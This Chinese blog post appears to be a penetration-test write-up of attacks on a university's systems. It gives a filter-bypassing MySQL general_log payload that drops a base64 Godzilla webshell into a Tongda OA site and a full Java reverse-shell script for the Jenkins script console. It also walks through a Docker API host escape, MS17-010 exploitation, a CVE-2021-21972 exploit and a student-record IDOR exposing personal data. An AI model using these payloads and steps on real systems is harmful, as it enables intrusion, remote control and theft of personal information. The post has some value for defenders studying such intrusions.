免责声明：本公众号所提供的文字和信息仅供学习和研究使用，不得用于任何非法用途。我们强烈谴责任何非法活动，并严格遵守法律法规。读者应该自觉遵守法律法规，不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。

最近暗月弄了数个安全圈交流的群 欢迎前来加入 有需要好友添加微信发送 进群

TDOA

1.拿到目标站点，是一个高校，Googlehacking找到一些学号以及教务系统。

2.随便点击一个链接，来到登录界面。

3.URL中有OAServices，这难道是个OA系统，于是fofa一手。

4.TD，嗯...梭哈是一种智慧，跑出管理员cookie。

5. 2016版的，历史漏洞挺多，找到数据库管理功能尝试通过写日志shell。

6.桌面随便新建个.sql文件进行上传，然后burp抓包开搞，先开启日志，set、select什么的都有过滤，但是能大小写绕过。

7. 设置日志路径。

8.ok，写shell，嗯...又有过滤，过滤了<?php和一些函数，能怎么办，绕呗，<?php这里php是可以去掉的，然后函数就用注释符来干扰。

9.写入成功，记得把日志停了。

Set global general_log=on;#开启记录日志
SET global general_log_file='D:/MYOA/webroot/xxx.php';#指定日志文件路径
SELECT '<? file_put_contents/**/(/**/$_SERVER/**/[/**/"DOCUMENT_ROOT"/**/]/**/./**/"//update.php"/**/,/**/base64_decode/**/(/**/"Base64编码后的哥斯拉马"/**/)/**/)/**/;/**/?><? /**/unlink/**/(/**/__FILE__/**/)/**/;/**/?>';#有过滤，使用/**/注释符进行绕过
Set global general_log=off;#关闭日志记录

10.访问一下xxx.php，然后会将哥斯拉马写入到当前目录的update.php中，哥斯拉上线。

11.system权限，非常棒。

12.tasklist /SVC查杀软，有MSE，嗯...人太菜了，不会写免杀，只能站在巨人的肩上。

13.直接dddd。

14.用哥斯拉上传执行，然后cs成功上线。

15.TDOA的话，数据库配置文件是在D:/MYOA/webroot/inc/oa_config，打开查看。

16.找到一些姓名 等信息，厚码。

未授权

1. 用之前收集到的学号尝试登录教务系统，抓包测试后发现验证码可复用，直接开爆，登录之后发现有个在校证明。

2.嗯哼，姓名、学院、sfz这些都有。

3.还有个二维码 扫下看看，哟，这xh字段不就是学号吗，还是明文。

4.将刚才登录的账号注销掉。

5.访问链接，修改学号，成功返回其他人信息。

MS17-010

1.搭建好隧道后，fscan开扫，发现一堆17010，msf直接开打。

2.扫描到的跟着往下打，梭哈的快乐。

Vmware Vcenter Unauthorized(CVE-2021-21972)

扫到一个CVE

[+] https://x.x.x.x/ware-vcenter-unauthorized-rce-cve-2021-21972

直接用exp:https://github.com/NS-Sp4ce/CVE-2021-21972

等待写入后 冰蝎连接

是真的菜，提权没成功。

Jenkins Unauthorized Rce

1.有个Jenkins

2.在系统管理->脚本命令行，可以命令执行。

3.直接反弹shell。

String host="x.x.x.x";
int port=1333;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

4.监听上线。

Docker Api Unauthorized Rce

1.还有一堆的Docker Api Unauthorized，直接开搞。

2. docker拉取一个镜像。

3.使用拉取的镜像启动一个新的容器，以sh或者/bin/bash作为shell启动，并且将该宿主机的根目录挂在到容器的/mnt目录下。

4.进入/mnt目录下即可逃逸到宿主机

5.写任务计划反弹shell

6.监听，等一分钟左右，上线。

总结

还有一堆ssh、mysql等弱口令以及Memcached unauthorized、Mongodb unauthorized这些，就不写了，整理整理交报告了。

关注公众号

公众号长期更新安全类文章，关注公众号，以便下次轻松查阅

觉得文章对你有帮助 请转发 点赞 收藏